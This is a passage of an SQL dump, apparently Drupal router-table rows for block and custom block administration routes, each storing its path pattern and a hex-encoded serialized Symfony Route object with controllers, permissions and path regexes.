('entity.block.delete_form', '/admin/structure/block/manage/{block}/delete', '/admin/structure/block/manage/%/delete', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34343a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f7b626c6f636b7d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31323a22626c6f636b2e64656c657465223b733a363a225f7469746c65223b733a31323a2252656d6f766520626c6f636b223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31373a2261646d696e697374657220626c6f636b73223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a353a22626c6f636b223b613a323a7b733a343a2274797065223b733a31323a22656e746974793a626c6f636b223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a353a22626c6f636b223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36313a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f283f503c626c6f636b3e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a353a22626c6f636b223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a353a22626c6f636b223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33383a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f252f64656c657465223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.block.disable', '/admin/structure/block/manage/{block}/disable', '/admin/structure/block/manage/%/disable', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34353a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f7b626c6f636b7d2f64697361626c65223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35383a225c44727570616c5c626c6f636b5c436f6e74726f6c6c65725c426c6f636b436f6e74726f6c6c65723a3a706572666f726d4f7065726174696f6e223b733a323a226f70223b733a373a2264697361626c65223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31333a22626c6f636b2e64697361626c65223b733a31313a225f637372665f746f6b656e223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a353a22626c6f636b223b613a323a7b733a343a2274797065223b733a31323a22656e746974793a626c6f636b223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a31373a226163636573735f636865636b2e63737266223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a353a22626c6f636b223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36323a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f283f503c626c6f636b3e5b5e2f5d2b2b292f64697361626c65247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a383a222f64697361626c65223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a353a22626c6f636b223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a353a22626c6f636b223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33393a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f252f64697361626c65223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.block.edit_form', '/admin/structure/block/manage/{block}', '/admin/structure/block/manage/%', 30, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33373a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f7b626c6f636b7d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31333a22626c6f636b2e64656661756c74223b733a363a225f7469746c65223b733a31353a22436f6e66696775726520626c6f636b223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31323a22626c6f636b2e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a353a22626c6f636b223b613a323a7b733a343a2274797065223b733a31323a22656e746974793a626c6f636b223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a353a22626c6f636b223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35343a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f283f503c626c6f636b3e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a353a22626c6f636b223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a353a22626c6f636b223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33303b733a31343a227061747465726e4f75746c696e65223b733a33313a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f25223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.block.enable', '/admin/structure/block/manage/{block}/enable', '/admin/structure/block/manage/%/enable', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34343a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f7b626c6f636b7d2f656e61626c65223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35383a225c44727570616c5c626c6f636b5c436f6e74726f6c6c65725c426c6f636b436f6e74726f6c6c65723a3a706572666f726d4f7065726174696f6e223b733a323a226f70223b733a363a22656e61626c65223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31323a22626c6f636b2e656e61626c65223b733a31313a225f637372665f746f6b656e223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a353a22626c6f636b223b613a323a7b733a343a2274797065223b733a31323a22656e746974793a626c6f636b223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a31373a226163636573735f636865636b2e63737266223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a353a22626c6f636b223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36313a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f283f503c626c6f636b3e5b5e2f5d2b2b292f656e61626c65247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f656e61626c65223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a353a22626c6f636b223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a353a22626c6f636b223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33383a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f252f656e61626c65223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.block_content.canonical', '/admin/content/block/{block_content}', '/admin/content/block/%', 14, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33363a222f61646d696e2f636f6e74656e742f626c6f636b2f7b626c6f636b5f636f6e74656e747d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31383a22626c6f636b5f636f6e74656e742e65646974223b733a31353a225f7469746c655f63616c6c6261636b223b733a35343a225c44727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e74697479436f6e74726f6c6c65723a3a7469746c65223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a32303a22626c6f636b5f636f6e74656e742e757064617465223b733a31333a22626c6f636b5f636f6e74656e74223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31333a22626c6f636b5f636f6e74656e74223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a626c6f636b5f636f6e74656e74223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35303a227b5e2f61646d696e2f636f6e74656e742f626c6f636b2f283f503c626c6f636b5f636f6e74656e743e5c642b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a31333a22626c6f636b5f636f6e74656e74223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f61646d696e2f636f6e74656e742f626c6f636b223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31343b733a31343a227061747465726e4f75746c696e65223b733a32323a222f61646d696e2f636f6e74656e742f626c6f636b2f25223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.block_content.collection', '/admin/content/block', '/admin/content/block', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32303a222f61646d696e2f636f6e74656e742f626c6f636b223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a6765745469746c65223b733a373a22766965775f6964223b733a31333a22626c6f636b5f636f6e74656e74223b733a31303a22646973706c61795f6964223b733a363a22706167655f31223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32303a2261636365737320626c6f636b206c696272617279223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a393a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a303a7b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2270616765223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c50616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b733a31363a2272657475726e735f726573706f6e7365223b623a303b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32373a227b5e2f61646d696e2f636f6e74656e742f626c6f636b247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f61646d696e2f636f6e74656e742f626c6f636b223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32303a222f61646d696e2f636f6e74656e742f626c6f636b223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.block_content.collection.bc', '/admin/structure/block/block-content', '/admin/structure/block/block-content', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33363a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e74223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a37373a225c44727570616c5c626c6f636b5f636f6e74656e745c436f6e74726f6c6c65725c426c6f636b436f6e74656e74436f6e74726f6c6c65723a3a626c6f636b4c6962726172795265646972656374223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a34353a2261636365737320626c6f636b206c6962726172792b61646d696e697374657220626c6f636b20636f6e74656e74223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34343a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b5c2d636f6e74656e74247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33363a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e74223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33363a222f61646d696e2f7374727563747572652f626c6f636b2f626c6f636b2d636f6e74656e74223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.block_content.content_translation_add', '/admin/content/block/{block_content}/translations/add/{source}/{target}', '/admin/content/block/%/translations/add', 59, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37313a222f61646d696e2f636f6e74656e742f626c6f636b2f7b626c6f636b5f636f6e74656e747d2f7472616e736c6174696f6e732f6164642f7b736f757263657d2f7b7461726765747d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a37323a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a616464223b733a363a22736f75726365223b4e3b733a363a22746172676574223b4e3b733a363a225f7469746c65223b733a333a22416464223b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31383a22626c6f636b5f636f6e74656e742e76696577223b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a22637265617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a333a7b733a363a22736f75726365223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a363a22746172676574223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a31333a22626c6f636b5f636f6e74656e74223b613a333a7b733a343a2274797065223b733a32303a22656e746974793a626c6f636b5f636f6e74656e74223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a22736f75726365223b693a323b733a363a22746172676574223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131383a227b5e2f61646d696e2f636f6e74656e742f626c6f636b2f283f503c626c6f636b5f636f6e74656e743e5b5e2f5d2b2b292f7472616e736c6174696f6e732f616464283f3a2f283f503c736f757263653e5b5e2f5d2b2b29283f3a2f283f503c7461726765743e5b5e2f5d2b2b29293f293f247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22746172676574223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22736f75726365223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31373a222f7472616e736c6174696f6e732f616464223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a22626c6f636b5f636f6e74656e74223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f61646d696e2f636f6e74656e742f626c6f636b223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a22736f75726365223b693a323b733a363a22746172676574223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a35393b733a31343a227061747465726e4f75746c696e65223b733a33393a222f61646d696e2f636f6e74656e742f626c6f636b2f252f7472616e736c6174696f6e732f616464223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('entity.block_content.content_translation_delete', '/admin/content/block/{block_content}/translations/delete/{language}', '/admin/content/block/%/translations/delete', 59, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36373a222f61646d696e2f636f6e74656e742f626c6f636b2f7b626c6f636b5f636f6e74656e747d2f7472616e736c6174696f6e732f64656c6574652f7b6c616e67756167657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f666f726d223b733a34323a22626c6f636b5f636f6e74656e742e636f6e74656e745f7472616e736c6174696f6e5f64656c6574696f6e223b733a383a226c616e6775616765223b4e3b733a363a225f7469746c65223b733a363a2244656c657465223b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a2264656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a383a226c616e6775616765223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a31333a22626c6f636b5f636f6e74656e74223b613a333a7b733a343a2274797065223b733a32303a22656e746974793a626c6f636b5f636f6e74656e74223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a383a226c616e6775616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39393a227b5e2f61646d696e2f636f6e74656e742f626c6f636b2f283f503c626c6f636b5f636f6e74656e743e5b5e2f5d2b2b292f7472616e736c6174696f6e732f64656c657465283f3a2f283f503c6c616e67756167653e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e6775616765223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f7472616e736c6174696f6e732f64656c657465223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a22626c6f636b5f636f6e74656e74223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f61646d696e2f636f6e74656e742f626c6f636b223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a383a226c616e6775616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a35393b733a31343a227061747465726e4f75746c696e65223b733a34323a222f61646d696e2f636f6e74656e742f626c6f636b2f252f7472616e736c6174696f6e732f64656c657465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.block_content.content_translation_edit', '/admin/content/block/{block_content}/translations/edit/{language}', '/admin/content/block/%/translations/edit', 59, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36353a222f61646d696e2f636f6e74656e742f626c6f636b2f7b626c6f636b5f636f6e74656e747d2f7472616e736c6174696f6e732f656469742f7b6c616e67756167657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31313a225f636f6e74726f6c6c6572223b733a37333a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a65646974223b733a383a226c616e6775616765223b4e3b733a363a225f7469746c65223b733a343a2245646974223b733a31343a22656e746974795f747970655f6964223b733a31333a22626c6f636b5f636f6e74656e74223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a22757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a383a226c616e6775616765223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a31333a22626c6f636b5f636f6e74656e74223b613a333a7b73